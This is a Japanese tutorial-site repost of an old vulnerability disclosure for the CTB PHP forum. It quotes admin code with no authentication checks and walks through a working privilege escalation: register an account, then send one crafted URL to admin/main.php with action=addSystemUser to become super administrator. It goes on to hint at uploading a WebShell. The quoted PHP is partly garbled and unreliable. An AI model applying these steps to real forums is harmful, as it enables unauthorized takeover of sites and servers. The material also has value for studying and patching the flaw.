コミュニティ 学ぶ ツールライブラリ レジャー
検索
日本語
ホームページ > php教程 > php手册 > 本文

美しいが危険なCTB

WBOY
リリース: 2016-06-13 12:44:01
オリジナル
1047 人が閲覧しました


>>>このスクラップを CaoJing に捧げます<<<

関係するバージョン:
^^^^^^
現在のすべてのバージョン (1.3Alpha が現在最高のバージョン)

説明:
^^^^^^
CTB は、Shiyi Digital によって開発および保守されているオープン ソースの PHP フォーラムです。バックグラウンド管理ファイルの検証に欠陥があるため、違法なユーザーがフォーラムのスーパー管理者を直接追加し、フォーラムやサーバーのセキュリティを脅かす可能性があります。

詳細:
^^^^
CTB は非常に標準的な書き方で、コードはよく整理されており、特に機能モジュールが美しいプログラムです。本当にたくさんのことを学びました。しかし、セキュリティ面が心配です:

次のコードを試してください:

/admin/main.php
~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
//get 変数を取得します
if( is_array($_GET) ) {
foreach($_GET as $k=>$v) {
if( is_array( $_GET[$k]) ) {
foreach($_GET[$k] as $k2=>$v2) {
$return[$k] = $v;
🎜>}
$mod = isset($_GET['mod']) ? : $_POST['mod'];
if (!file_exists( $mod.".php" {
$mod = "mainright";
}
require_once ($mod.".php ";
//---------- ---------------------------------- ---------------- ------------------

//クラス変数を初期化します
$ctb = 新しいモジュール;
$ctb->set = $set;
$ctb->tplPath = "./templates"; ctb->sess = isset($_COOKIE["sess_adminname"]) $_COOKIE : $_SESSION>~~~~~~~~~~; ~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~

ここでは検証がありません。追加するファイルを見てみましょう管理者:

/admin/systemuser.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~
class Module extends CommonClass
//システム管理モジュールのサブクラス
{
functionexecute() {
switch($this->input ['アクション']) {
...
case 'addSystemUser':
$this->addSystemUser();
...
} }

function add SystemUser()
{
//入力データの簡単なフォーマット
$this->inputCheck("main.php?mod=systemuser&action=showSystemUser";
/ /追加操作を実行します
$this->file = "../".$this->set[dataPath]."/users/list.php";
$systemLine = $this-> ;select(4, $this->input['systemUserName' ]);
....
~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~ ~~~~~~~

まだ検証されていません。良い旅を!

使い方:
^^^^^^^
まずはユーザー登録:

ログインID: cat
ユーザー名: Dog
パスワード: ilikecat
パスワードを繰り返します: ilikecat
メール: cat@dog.com

次に、次の URL を送信します:

http://www.target.com/ctb/admin/main . php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser

はは、あなたはスーパー管理者になりました、信じられませんか?バックエンドログイン用に次の URL を送信します:

http://www.psych.com/ctb/admin/main.php?mod=login

管理名: cat
管理パスワード: ilikecat

やあ...本当にうまくいきました!

今すぐバックグラウンドアップロードのファイルタイプを変更して、WebShell をアップロードしますか?うーん、やっぱり察しがつきましたね…

追記: CTB コードのコメントに明らかな誤字も見つけましたので、併せて修正していただければと思います。

関連ラベル:
危険な かわいい バージョン 現在のところ
ソース:php.cn
前の記事:正規表現の構文 次の記事:PHP のデフォルトのインストールによりシステムの脆弱性が発生する
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
著者別の最新記事
最新の問題
`:after` 疑似要素をスタイル付きコンポーネントに正しく適用するための React.js ガイド この美しい下線アニメーションを見つけました。 <ul><li><ahref="#">概要</a></li&...
から 2024-04-04 22:28:08
0
1
1322
PHP: 複数の重複一致の複数のインスタンスを照合して置換するための正規表現 ユーザーがコンテンツに ((MagicalSword)) のようなものを追加できるゲーム コミュニティ/データベース用のショートコード システムを作成しようとしています。これは、イ...
から 2024-04-04 15:41:01
0
1
439
Illuminate\Database\QueryException: SQLSTATE: 一般エラー: 1364 データを入力できないのはなぜですか?予定表に userid 属性を入力したくない場合は、良好な相関関係があります。\database\QueryException: SQLSTAT...
から 2024-04-03 22:39:00
0
1
363
別のボタンがフォーカスされている、またはフォーカスされているときに、ボタンのフォーカス状態をトリガーするにはどうすればよいですか? 参照の表示 (ボタン) ライブラリ名が選択またはクリックされたときに、次の非アクティブなボタンがアクティブになる (明るい赤になる) ようにしたいと考えています。グーグルで調べたと...
から 2024-04-02 16:49:31
0
1
336
ボタンをアクティブにするとホバー効果が誤動作する 私は Web 開発 (HTML、CSS、JS) の基礎を学ぼうとしているので、動作する Apple 電卓を作ろうとしています。小さなバグに気づくまではすべてが正常に動作していました...
から 2024-04-01 21:51:26
0
1
396
関連トピック
詳細>
人気のおすすめ
人気のチュートリアル
詳細>
関連するチュートリアル
人気のおすすめ
最新のコース
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート